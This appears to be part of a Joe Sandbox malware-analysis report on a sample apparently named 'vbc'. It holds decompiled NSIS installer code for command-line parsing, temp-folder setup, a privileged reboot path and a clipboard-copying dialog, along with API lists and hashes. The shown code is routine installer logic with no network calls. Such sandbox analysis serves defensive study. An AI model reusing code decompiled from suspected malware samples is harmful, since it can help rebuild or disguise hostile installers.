                    							__eflags = _t199;
                    						}
                    						__eflags =  *_t199 - 0x2f;
                    						if( *_t199 != 0x2f) {
                    							L32:
                    							_t199 = E00405E16(_t199, _v12);
                    							__eflags =  *_t199 - _t234;
                    							if(__eflags == 0) {
                    								_t199 = _t199 + 2;
                    								__eflags = _t199;
                    							}
                    							continue;
                    						} else {
                    							_t199 = _t199 + 2;
                    							__eflags =  *_t199 - 0x53;
                    							if( *_t199 != 0x53) {
                    								L24:
                    								asm("cdq");
                    								asm("cdq");
                    								_t215 = L"NCRC" & 0x0000ffff;
                    								asm("cdq");
                    								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                    								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                    								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                    									L29:
                    									asm("cdq");
                    									asm("cdq");
                    									_t210 = L" /D=" & 0x0000ffff;
                    									asm("cdq");
                    									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                    									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                    									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                    										L31:
                    										_t234 = 0x22;
                    										goto L32;
                    									}
                    									__eflags =  *_t199 - _t230;
                    									if( *_t199 == _t230) {
                    										 *(_t199 - 4) = _t189;
                    										__eflags = _t199;
                    										E0040651A(0x7b3800, _t199);
                    										L37:
                    										_t235 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                    										GetTempPathW(0x400, _t235);
                    										_t116 = E004034D9(_t199, _t252);
                    										_t253 = _t116;
                    										if(_t116 != 0) {
                    											L40:
                    											DeleteFileW(L"1033"); // executed
                    											_t118 = E0040307D(_t255, _v20); // executed
                    											_v8 = _t118;
                    											if(_t118 != _t189) {
                    												L68:
                    												E00403AEF();
                    												__imp__OleUninitialize();
                    												if(_v8 == _t189) {
                    													if( *0x7a8af4 == _t189) {
                    														L77:
                    														_t120 =  *0x7a8b0c;
                    														if(_t120 != 0xffffffff) {
                    															_v24 = _t120;
                    														}
                    														ExitProcess(_v24);
                    													}
                    													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                    														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                    														_v40.PrivilegeCount = 1;
                    														_v28 = 2;
                    														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                    													}
                    													_t124 = E004068E7(4);
                    													if(_t124 == _t189) {
                    														L75:
                    														if(ExitWindowsEx(2, 0x80040002) != 0) {
                    															goto L77;
                    														}
                    														goto L76;
                    													} else {
                    														_push(0x80040002);
                    														_push(0x25);
                    														_push(_t189);
                    														_push(_t189);
                    														_push(_t189);
                    														if( *_t124() == 0) {
                    															L76:
                    															E0040140B(9);
                    															goto L77;
                    														}
                    														goto L75;
                    													}
                    												}
                    												E00405B7A(_v8, 0x200010);
                    												ExitProcess(2);
                    											}
                    											if( *0x7a8a7c == _t189) {
                    												L51:
                    												 *0x7a8b0c =  *0x7a8b0c | 0xffffffff;
                    												_v24 = E00403BC9(_t265);
                    												goto L68;
                    											}
                    											_t219 = E00405E16(0x7b3000, _t189);
                    											if(_t219 < 0x7b3000) {
                    												L48:
                    												_t264 = _t219 - 0x7b3000;
                    												_v8 = L"Error launching installer";
                    												if(_t219 < 0x7b3000) {
                    													_t190 = E00405AE5(__eflags);
                    													lstrcatW(_t235, L"~nsu");
                    													__eflags = _t190;
                    													if(_t190 != 0) {
                    														lstrcatW(_t235, "A");
                    													}
                    													lstrcatW(_t235, L".tmp");
                    													_t138 = lstrcmpiW(_t235, 0x7b4800);
                    													__eflags = _t138;
                    													if(_t138 == 0) {
                    														L67:
                    														_t189 = 0;
                    														__eflags = 0;
                    														goto L68;
                    													} else {
                    														__eflags = _t190;
                    														_push(_t235);
                    														if(_t190 == 0) {
                    															E00405AC8();
                    														} else {
                    															E00405A4B();
                    														}
                    														SetCurrentDirectoryW(_t235);
                    														__eflags =  *0x7b3800;
                    														if( *0x7b3800 == 0) {
                    															E0040651A(0x7b3800, 0x7b4800);
                    														}
                    														E0040651A(0x7a9000, _v16);
                    														_t202 = "A" & 0x0000ffff;
                    														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                    														__eflags = _t144;
                    														_v12 = 0x1a;
                    														 *0x7a9800 = _t144;
                    														do {
                    															E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x120)));
                    															DeleteFileW(0x79f708);
                    															__eflags = _v8;
                    															if(_v8 != 0) {
                    																_t149 = CopyFileW(0x7b6800, 0x79f708, 1);
                    																__eflags = _t149;
                    																if(_t149 != 0) {
                    																	E004062DA(_t202, 0x79f708, 0);
                    																	E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x124)));
                    																	_t153 = E00405AFD(0x79f708);
                    																	__eflags = _t153;
                    																	if(_t153 != 0) {
                    																		CloseHandle(_t153);
                    																		_v8 = 0;
                    																	}
                    																}
                    															}
                    															 *0x7a9800 =  *0x7a9800 + 1;
                    															_t61 =  &_v12;
                    															 *_t61 = _v12 - 1;
                    															__eflags =  *_t61;
                    														} while ( *_t61 != 0);
                    														E004062DA(_t202, _t235, 0);
                    														goto L67;
                    													}
                    												}
                    												 *_t219 = _t189;
                    												_t222 =  &(_t219[2]);
                    												_t158 = E00405EF1(_t264,  &(_t219[2]));
                    												_t265 = _t158;
                    												if(_t158 == 0) {
                    													goto L68;
                    												}
                    												E0040651A(0x7b3800, _t222);
                    												E0040651A(0x7b4000, _t222);
                    												_v8 = _t189;
                    												goto L51;
                    											}
                    											asm("cdq");
                    											asm("cdq");
                    											asm("cdq");
                    											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                    											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                    											while( *_t219 != _t205 || _t219[1] != _t168) {
                    												_t219 = _t219;
                    												if(_t219 >= 0x7b3000) {
                    													continue;
                    												}
                    												break;
                    											}
                    											_t189 = 0;
                    											goto L48;
                    										}
                    										GetWindowsDirectoryW(_t235, 0x3fb);
                    										lstrcatW(_t235, L"\\Temp");
                    										_t171 = E004034D9(_t199, _t253);
                    										_t254 = _t171;
                    										if(_t171 != 0) {
                    											goto L40;
                    										}
                    										GetTempPathW(0x3fc, _t235);
                    										lstrcatW(_t235, L"Low");
                    										SetEnvironmentVariableW(L"TEMP", _t235);
                    										SetEnvironmentVariableW(L"TMP", _t235);
                    										_t176 = E004034D9(_t199, _t254);
                    										_t255 = _t176;
                    										if(_t176 == 0) {
                    											goto L68;
                    										}
                    										goto L40;
                    									}
                    									goto L31;
                    								}
                    								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                    								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                    									goto L29;
                    								}
                    								_t178 =  *((intOrPtr*)(_t199 + 8));
                    								__eflags = _t178 - 0x20;
                    								if(_t178 == 0x20) {
                    									L28:
                    									_t36 =  &_v20;
                    									 *_t36 = _v20 | 0x00000004;
                    									__eflags =  *_t36;
                    									goto L29;
                    								}
                    								__eflags = _t178 - _t189;
                    								if(_t178 != _t189) {
                    									goto L29;
                    								}
                    								goto L28;
                    							}
                    							_t179 =  *((intOrPtr*)(_t199 + 2));
                    							__eflags = _t179 - _t210;
                    							if(_t179 == _t210) {
                    								L23:
                    								 *0x7a8b00 = 1;
                    								goto L24;
                    							}
                    							__eflags = _t179 - _t189;
                    							if(_t179 != _t189) {
                    								goto L24;
                    							}
                    							goto L23;
                    						}
                    					} else {
                    						goto L16;
                    					}
                    					do {
                    						L16:
                    						_t199 = _t199 + 2;
                    						__eflags =  *_t199 - _t210;
                    					} while ( *_t199 == _t210);
                    					goto L17;
                    				}
                    				goto L37;
                    			}















































                    0x00403518
                    0x00403519
                    0x00403520
                    0x00403523
                    0x0040352a
                    0x0040352d
                    0x00403540
                    0x00403546
                    0x00403549
                    0x0040354c
                    0x0040355a
                    0x00403562
                    0x0040356d
                    0x00403586
                    0x00403588
                    0x00403590
                    0x00403590
                    0x0040359b
                    0x0040359d
                    0x0040359d
                    0x004035b2
                    0x004035d7
                    0x004035e5
                    0x004035e8
                    0x004035ef
                    0x004035f6
                    0x004035f6
                    0x004035ef
                    0x004035f8
                    0x004035fd
                    0x004035fe
                    0x0040360a
                    0x0040360e
                    0x00403615
                    0x00403623
                    0x00403628
                    0x0040362f
                    0x00403633
                    0x00403637
                    0x00403639
                    0x00403639
                    0x00403637
                    0x00403640
                    0x00403647
                    0x0040364d
                    0x00403665
                    0x00403675
                    0x00403687
                    0x0040368e
                    0x00403690
                    0x00403691
                    0x004036a2
                    0x004036a6
                    0x004036a6
                    0x004036b9
                    0x004036bb
                    0x004037b5
                    0x004037b5
                    0x004037b8
                    0x004037bb
                    0x00000000
                    0x00000000
                    0x004036c5
                    0x004036c6
                    0x004036c9
                    0x004036d2
                    0x004036d2
                    0x004036d5
                    0x004036d8
                    0x004036db
                    0x004036de
                    0x004036de
                    0x004036de
                    0x004036df
                    0x004036e3
                    0x004037a3
                    0x004037ac
                    0x004037ae
                    0x004037b1
                    0x004037b4
                    0x004037b4
                    0x004037b4
                    0x00000000
                    0x004036e9
                    0x004036ea
                    0x004036eb
                    0x004036ef
                    0x00403709
                    0x00403710
                    0x00403723
                    0x00403724
                    0x00403739
                    0x0040373e
                    0x00403740
                    0x00403742
                    0x0040375e
                    0x00403765
                    0x00403778
                    0x00403779
                    0x0040378e
                    0x00403794
                    0x00403796
                    0x00403798
                    0x004037a0
                    0x004037a2
                    0x00000000
                    0x004037a2
                    0x0040379c
                    0x0040379e
                    0x004037c3
                    0x004037c7
                    0x004037d0
                    0x004037d5
                    0x004037db
                    0x004037e6
                    0x004037e8
                    0x004037ed
                    0x004037ef
                    0x00403847
                    0x0040384c
                    0x00403855
                    0x0040385c
                    0x0040385f
                    0x00403a36
                    0x00403a36
                    0x00403a3b
                    0x00403a44
                    0x00403a61
                    0x00403ad9
                    0x00403ad9
                    0x00403ae1
                    0x00403ae3
                    0x00403ae3
                    0x00403ae9
                    0x00403ae9
                    0x00403a78
                    0x00403a84
                    0x00403a95
                    0x00403a9c
                    0x00403aa3
                    0x00403aa3
                    0x00403aab
                    0x00403ab7
                    0x00403ac5
                    0x00403ad0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403ab9
                    0x00403ab9
                    0x00403aba
                    0x00403abc
                    0x00403abd
                    0x00403abe
                    0x00403ac3
                    0x00403ad2
                    0x00403ad4
                    0x00000000
                    0x00403ad4
                    0x00000000
                    0x00403ac3
                    0x00403ab7
                    0x00403a4e
                    0x00403a55
                    0x00403a55
                    0x0040386b
                    0x00403912
                    0x00403912
                    0x0040391e
                    0x00000000
                    0x0040391e
                    0x0040387c
                    0x00403884
                    0x004038d6
                    0x004038d6
                    0x004038dc
                    0x004038e3
                    0x00403931
                    0x00403933
                    0x00403938
                    0x0040393a
                    0x00403942
                    0x00403942
                    0x0040394d
                    0x00403959
                    0x0040395f
                    0x00403961
                    0x00403a34
                    0x00403a34
                    0x00403a34
                    0x00000000
                    0x00403967
                    0x00403967
                    0x00403969
                    0x0040396a
                    0x00403973
                    0x0040396c
                    0x0040396c
                    0x0040396c
                    0x00403979
                    0x00403981
                    0x00403988
                    0x00403990
                    0x00403990
                    0x0040399d
                    0x004039a9
                    0x004039b3
                    0x004039b3
                    0x004039b5
                    0x004039bc
                    0x004039c6
                    0x004039d2
                    0x004039d8
                    0x004039de
                    0x004039e1
                    0x004039eb
                    0x004039f1
                    0x004039f3
                    0x004039f7
                    0x00403a08
                    0x00403a0e
                    0x00403a13
                    0x00403a15
                    0x00403a18
                    0x00403a1e
                    0x00403a1e
                    0x00403a15
                    0x004039f3
                    0x00403a21
                    0x00403a28
                    0x00403a28
                    0x00403a28
                    0x00403a28
                    0x00403a2f
                    0x00000000
                    0x00403a2f
                    0x00403961
                    0x004038e5
                    0x004038e8
                    0x004038ec
                    0x004038f1
                    0x004038f3
                    0x00000000
                    0x00000000
                    0x004038ff
                    0x0040390a
                    0x0040390f
                    0x00000000
                    0x0040390f
                    0x0040388d
                    0x004038a5
                    0x004038b6
                    0x004038b7
                    0x004038bb
                    0x004038bd
                    0x004038cb
                    0x004038d2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004038d2
                    0x004038d4
                    0x00000000
                    0x004038d4
                    0x004037f7
                    0x00403803
                    0x00403808
                    0x0040380d
                    0x0040380f
                    0x00000000
                    0x00000000
                    0x00403817
                    0x0040381f
                    0x00403830
                    0x00403838
                    0x0040383a
                    0x0040383f
                    0x00403841
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403841
                    0x00000000
                    0x0040379e
                    0x00403747
                    0x00403749
                    0x00000000
                    0x00000000
                    0x0040374b
                    0x0040374f
                    0x00403753
                    0x0040375a
                    0x0040375a
                    0x0040375a
                    0x0040375a
                    0x00000000
                    0x0040375a
                    0x00403755
                    0x00403758
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403758
                    0x004036f1
                    0x004036f5
                    0x004036f8
                    0x004036ff
                    0x004036ff
                    0x00000000
                    0x004036ff
                    0x004036fa
                    0x004036fd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004036fd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004036cb
                    0x004036cb
                    0x004036cc
                    0x004036cd
                    0x004036cd
                    0x00000000
                    0x004036cb
                    0x00000000

                    APIs
                    • SetErrorMode.KERNELBASE(00008001), ref: 0040352D
                    • GetVersionExW.KERNEL32(?), ref: 00403556
                    • GetVersionExW.KERNEL32(0000011C), ref: 0040356D
                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403604
                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403640
                    • OleInitialize.OLE32(00000000), ref: 00403647
                    • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 00403665
                    • GetCommandLineW.KERNEL32(007A7A60,NSIS Error), ref: 0040367A
                    • CharNextW.USER32(00000000), ref: 004036B3
                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004037E6
                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037F7
                    • lstrcatW.KERNEL32 ref: 00403803
                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403817
                    • lstrcatW.KERNEL32 ref: 0040381F
                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403830
                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403838
                    • DeleteFileW.KERNELBASE(1033), ref: 0040384C
                    • lstrcatW.KERNEL32 ref: 00403933
                    • lstrcatW.KERNEL32 ref: 00403942
                      • Part of subcall function 00405AC8: CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                    • lstrcatW.KERNEL32 ref: 0040394D
                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,?), ref: 00403959
                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403979
                    • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?), ref: 004039D8
                    • CopyFileW.KERNEL32 ref: 004039EB
                    • CloseHandle.KERNEL32(00000000), ref: 00403A18
                    • OleUninitialize.OLE32 ref: 00403A3B
                    • ExitProcess.KERNEL32 ref: 00403A55
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A69
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403A70
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A84
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AA3
                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AC8
                    • ExitProcess.KERNEL32 ref: 00403AE9
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                    • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                    • API String ID: 3859024572-2607992671
                    • Opcode ID: 4f4eec0de79c21e215e23cc6c73292148191a8a8d39fbf5898b354216cb2abd3
                    • Instruction ID: 53a60b58fdbd25313d51bce5ca3a2b86b24fade18f433b590921527e5da6acff
                    • Opcode Fuzzy Hash: 4f4eec0de79c21e215e23cc6c73292148191a8a8d39fbf5898b354216cb2abd3
                    • Instruction Fuzzy Hash: B2E1F8B0A00214ABD720AFB59D45ABF3AB8EB45705F10807EF581B62D1DB7C8B41CB6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 143 4056bb-4056d6 144 405865-40586c 143->144 145 4056dc-4057a3 GetDlgItem * 3 call 4044ab call 404e04 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405896-4058a3 144->147 148 40586e-405890 GetDlgItem CreateThread CloseHandle 144->148 168 4057c1-4057c4 145->168 169 4057a5-4057bf SendMessageW * 2 145->169 150 4058c1-4058cb 147->150 151 4058a5-4058ab 147->151 148->147 154 405921-405925 150->154 155 4058cd-4058d3 150->155 152 4058e6-4058ef call 4044dd 151->152 153 4058ad-4058bc ShowWindow * 2 call 4044ab 151->153 165 4058f4-4058f8 152->165 153->150 154->152 162 405927-40592d 154->162 158 4058d5-4058e1 call 40444f 155->158 159 4058fb-40590b ShowWindow 155->159 158->152 166 40591b-40591c call 40444f 159->166 167 40590d-405916 call 40557c 159->167 162->152 163 40592f-405942 SendMessageW 162->163 170 405a44-405a46 163->170 171 405948-405973 CreatePopupMenu call 406557 AppendMenuW 163->171 166->154 167->166 172 4057d4-4057eb call 404476 168->172 173 4057c6-4057d2 SendMessageW 168->173 169->168 170->165 180 405975-405985 GetWindowRect 171->180 181 405988-40599d TrackPopupMenu 171->181 182 405821-405842 GetDlgItem SendMessageW 172->182 183 4057ed-405801 ShowWindow 172->183 173->172 180->181 181->170 184 4059a3-4059ba 181->184 182->170 187 405848-405860 SendMessageW * 2 182->187 185 405810 183->185 186 405803-40580e ShowWindow 183->186 188 4059bf-4059da SendMessageW 184->188 189 405816-40581c call 4044ab 185->189 186->189 187->170 188->188 190 4059dc-4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->182 192 405a01-405a28 SendMessageW 190->192 192->192 193 405a2a-405a3e GlobalUnlock SetClipboardData CloseClipboard 192->193 193->170
                    C-Code - Quality: 95%
                    			E004056BB(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                    				struct HWND__* _v8;
                    				long _v12;
                    				struct tagRECT _v28;
                    				void* _v36;
                    				signed int _v40;
                    				int _v44;
                    				int _v48;
                    				signed int _v52;
                    				int _v56;
                    				void* _v60;
                    				void* _v68;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				struct HWND__* _t94;
                    				long _t95;
                    				int _t100;
                    				void* _t108;
                    				intOrPtr _t119;
                    				void* _t127;
                    				intOrPtr _t130;
                    				struct HWND__* _t134;
                    				int _t156;
                    				int _t159;
                    				struct HMENU__* _t164;
                    				struct HWND__* _t168;
                    				struct HWND__* _t169;
                    				int _t171;
                    				void* _t172;
                    				short* _t173;
                    				short* _t175;
                    				int _t177;
                    
                    				_t169 =  *0x7a7a44;
                    				_t156 = 0;
                    				_v8 = _t169;
                    				if(_a8 != 0x110) {
                    					if(_a8 == 0x405) {
                    						_t127 = CreateThread(0, 0, E0040564F, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                    						CloseHandle(_t127); // executed
                    					}
                    					if(_a8 != 0x111) {
                    						L17:
                    						_t171 = 1;
                    						if(_a8 != 0x404) {
                    							L25:
                    							if(_a8 != 0x7b) {
                    								goto L20;
                    							}
                    							_t94 = _v8;
                    							if(_a12 != _t94) {
                    								goto L20;
                    							}
                    							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                    							_a8 = _t95;
                    							if(_t95 <= _t156) {
                    								L36:
                    								return 0;
                    							}
                    							_t164 = CreatePopupMenu();
                    							AppendMenuW(_t164, _t156, _t171, E00406557(_t156, _t164, _t171, _t156, 0xffffffe1));
                    							_t100 = _a16;
                    							_t159 = _a16 >> 0x10;
                    							if(_a16 == 0xffffffff) {
                    								GetWindowRect(_v8,  &_v28);
                    								_t100 = _v28.left;
                    								_t159 = _v28.top;
                    							}
                    							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                    								_v60 = _t156;
                    								_v48 = 0x7a1f48;
                    								_v44 = 0x1000;
                    								_a4 = _a8;
                    								do {
                    									_a4 = _a4 - 1;
                    									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                    								} while (_a4 != _t156);
                    								OpenClipboard(_t156);
                    								EmptyClipboard();
                    								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                    								_a4 = _t108;
                    								_t172 = GlobalLock(_t108);
                    								do {
                    									_v48 = _t172;
                    									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                    									 *_t173 = 0xd;
                    									_t175 = _t173 + 2;
                    									 *_t175 = 0xa;
                    									_t172 = _t175 + 2;
                    									_t156 = _t156 + 1;
                    								} while (_t156 < _a8);
                    								GlobalUnlock(_a4);
                    								SetClipboardData(0xd, _a4);
                    								CloseClipboard();
                    							}
                    							goto L36;
                    						}
                    						if( *0x7a7a2c == _t156) {
                    							ShowWindow( *0x7a8a68, 8);
                    							if( *0x7a8aec == _t156) {
                    								_t119 =  *0x7a0f20; // 0x9f0f84
                    								E0040557C( *((intOrPtr*)(_t119 + 0x34)), _t156);
                    							}
                    							E0040444F(_t171);
                    							goto L25;
                    						}
                    						 *0x7a0718 = 2;
                    						E0040444F(0x78);
                    						goto L20;
                    					} else {
                    						if(_a12 != 0x403) {
                    							L20:
                    							return E004044DD(_a8, _a12, _a16);
                    						}
                    						ShowWindow( *0x7a7a30, _t156);
                    						ShowWindow(_t169, 8);
                    						E004044AB(_t169);
                    						goto L17;
                    					}
                    				}
                    				_v52 = _v52 | 0xffffffff;
                    				_v40 = _v40 | 0xffffffff;
                    				_t177 = 2;
                    				_v60 = _t177;
                    				_v56 = 0;
                    				_v48 = 0;
                    				_v44 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				_t130 =  *0x7a8a70;
                    				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                    				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                    				 *0x7a7a30 = GetDlgItem(_a4, 0x403);
                    				 *0x7a7a28 = GetDlgItem(_a4, 0x3ee);
                    				_t134 = GetDlgItem(_a4, 0x3f8);
                    				 *0x7a7a44 = _t134;
                    				_v8 = _t134;
                    				E004044AB( *0x7a7a30);
                    				 *0x7a7a34 = E00404E04(4);
                    				 *0x7a7a4c = 0;
                    				GetClientRect(_v8,  &_v28);
                    				_v52 = _v28.right - GetSystemMetrics(_t177);
                    				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                    				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                    				if(_a8 >= 0) {
                    					SendMessageW(_v8, 0x1001, 0, _a8);
                    					SendMessageW(_v8, 0x1026, 0, _a8);
                    				}
                    				if(_a12 >= _t156) {
                    					SendMessageW(_v8, 0x1024, _t156, _a12);
                    				}
                    				_push( *((intOrPtr*)(_a16 + 0x30)));
                    				_push(0x1b);
                    				E00404476(_a4);
                    				if(( *0x7a8a78 & 0x00000003) != 0) {
                    					ShowWindow( *0x7a7a30, _t156);
                    					if(( *0x7a8a78 & 0x00000002) != 0) {
                    						 *0x7a7a30 = _t156;
                    					} else {
                    						ShowWindow(_v8, 8);
                    					}
                    					E004044AB( *0x7a7a28);
                    				}
                    				_t168 = GetDlgItem(_a4, 0x3ec);
                    				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                    				if(( *0x7a8a78 & 0x00000004) != 0) {
                    					SendMessageW(_t168, 0x409, _t156, _a12);
                    					SendMessageW(_t168, 0x2001, _t156, _a8);
                    				}
                    				goto L36;
                    			}



































                    0x004056c3
                    0x004056c9
                    0x004056d3
                    0x004056d6
                    0x0040586c
                    0x00405889
                    0x00405890
                    0x00405890
                    0x004058a3
                    0x004058c1
                    0x004058c3
                    0x004058cb
                    0x00405921
                    0x00405925
                    0x00000000
                    0x00000000
                    0x00405927
                    0x0040592d
                    0x00000000
                    0x00000000
                    0x00405937
                    0x0040593f
                    0x00405942
                    0x00405a44
                    0x00000000
                    0x00405a44
                    0x00405951
                    0x0040595c
                    0x00405965
                    0x00405970
                    0x00405973
                    0x0040597c
                    0x00405982
                    0x00405985
                    0x00405985
                    0x0040599d
                    0x004059a6
                    0x004059a9
                    0x004059b0
                    0x004059b7
                    0x004059bf
                    0x004059bf
                    0x004059d6
                    0x004059d6
                    0x004059dd
                    0x004059e3
                    0x004059ef
                    0x004059f6
                    0x004059ff
                    0x00405a01
                    0x00405a04
                    0x00405a13
                    0x00405a16
                    0x00405a1c
                    0x00405a1d
                    0x00405a23
                    0x00405a24
                    0x00405a25
                    0x00405a2d
                    0x00405a38
                    0x00405a3e
                    0x00405a3e
                    0x00000000
                    0x0040599d
                    0x004058d3
                    0x00405903
                    0x0040590b
                    0x0040590d
                    0x00405916
                    0x00405916
                    0x0040591c
                    0x00000000
                    0x0040591c
                    0x004058d7
                    0x004058e1
                    0x00000000
                    0x004058a5
                    0x004058ab
                    0x004058e6
                    0x00000000
                    0x004058ef
                    0x004058b4
                    0x004058b9
                    0x004058bc
                    0x00000000
                    0x004058bc
                    0x004058a3
                    0x004056dc
                    0x004056e0
                    0x004056e8
                    0x004056ec
                    0x004056ef
                    0x004056f2
                    0x004056f5
                    0x004056f8
                    0x004056f9
                    0x004056fa
                    0x00405713
                    0x00405716
                    0x00405720
                    0x0040572f
                    0x00405737
                    0x0040573f
                    0x00405744
                    0x00405747
                    0x00405753
                    0x0040575c
                    0x00405765
                    0x00405787
                    0x0040578d
                    0x0040579e
                    0x004057a3
                    0x004057b1
                    0x004057bf
                    0x004057bf
                    0x004057c4
                    0x004057d2
                    0x004057d2
                    0x004057d7
                    0x004057da
                    0x004057df
                    0x004057eb
                    0x004057f4
                    0x00405801
                    0x00405810
                    0x00405803
                    0x00405808
                    0x00405808
                    0x0040581c
                    0x0040581c
                    0x00405830
                    0x00405839
                    0x00405842
                    0x00405852
                    0x0040585e
                    0x0040585e
                    0x00000000

                    APIs
                    • GetDlgItem.USER32(?,00000403), ref: 00405719
                    • GetDlgItem.USER32(?,000003EE), ref: 00405728
                    • GetClientRect.USER32 ref: 00405765
                    • GetSystemMetrics.USER32 ref: 0040576C
                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040578D
                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040579E
